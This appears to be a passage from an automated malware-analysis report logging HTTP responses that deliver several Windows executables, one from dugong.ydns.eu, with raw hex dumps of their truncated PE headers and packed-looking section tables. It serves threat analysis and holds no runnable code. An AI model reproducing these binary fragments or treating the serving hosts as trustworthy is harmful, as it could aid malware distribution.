09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:25:53 GMTETag: "1d4c00-62fa693f1c20c"Accept-Ranges: bytesContent-Length: 1920000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 40 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 43 13 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 24 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 24 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 62 73 68 69 71 78 70 00 40 1a 00 00 f0 31 00 00 38 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6a 64 73 6d 6d 7a 78 00 10 00 00 00 30 4c 00 00 04 00 00 00 26 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4c 00 00 22 00 00 00 2a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:16:57 GMTETag: "3c2e00-62fa673fa87d8"Accept-Ranges: bytesContent-Length: 3943936Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 70 4d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 0e 25 00 00 6a 29 00 00 00 00 00 00 e0 a0 00 00 10 00 00 00 50 48 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 10 a1 00 00 04 00 00 45 3c 3c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 90 53 00 68 00 00 00 00 80 52 00 bc 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 53 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 52 00 00 10 00 00 00 ea 1f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 0a 01 00 00 80 52 00 00 0c 01 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 53 00 00 02 00 00 00 06 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 32 00 00 a0 53 00 00 02 00 00 00 08 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6f 75 6f 75 62 74 66 00 00 1b 00 00 d0 85 00 00 
fc 1a 00 00 0a 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 74 61 78 6e 73 6e 6e 00 10 00 00 00 d0 a0 00 00 06 00 00 00 06 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 a0 00 00 22 00 00 00 0c 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:25:53 GMTETag: "1d4c00-62fa693f1c20c"Accept-Ranges: bytesContent-Length: 1920000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 40 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 43 13 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 24 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 24 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 62 73 68 69 71 78 70 00 40 1a 00 00 f0 31 00 00 38 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6a 64 73 6d 6d 7a 78 00 10 00 00 00 30 4c 00 00 04 00 00 00 26 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4c 00 00 22 00 00 00 2a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:10:51 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:45 GMTETag: "a7550-6288a270bb76e"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 
03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:53 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 06:25:53 GMTETag: "1d4c00-62fa693f1c20c"Accept-Ranges: bytesContent-Length: 1920000Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 40 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4c 00 00 04 00 00 43 13 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 24 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 24 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 62 73 68 69 71 78 70 00 40 1a 00 00 f0 31 00 00 38 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6a 64 73 6d 6d 7a 78 00 10 00 00 00 30 4c 00 00 04 00 00 00 26 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4c 00 00 22 00 00 00 2a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 06 Mar 2025 07:10:53 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveUpgrade: h2,h2cLast-Modified: Thu, 05 Dec 2024 18:34:46 GMTETag: "94750-6288a270e7691"Accept-Ranges: bytesX-Served-By: dugong.ydns.euData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 
00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 06 Mar 2025 07:10:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 02 Mar 2025 15:16:11 GMTETag: "6f600-62f5d850dc4c0"Accept-Ranges: bytesContent-Length: 456192Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 35 dd 0f b0 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 46 01 00 00 08 00 00 00 00 00 00 8e 65 01 00 00 20 00 00 00 80 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 07 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 65 01 00 4b 00 00 00 00 80 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 0c 00 00 00 f8 64 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 45 01 00 00 20 00 00 00 46 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 80 01 00 00 06 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 43 53 53 00 00 00 00 00 a4 05 00 00 c0 01 00 00 a4 05 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
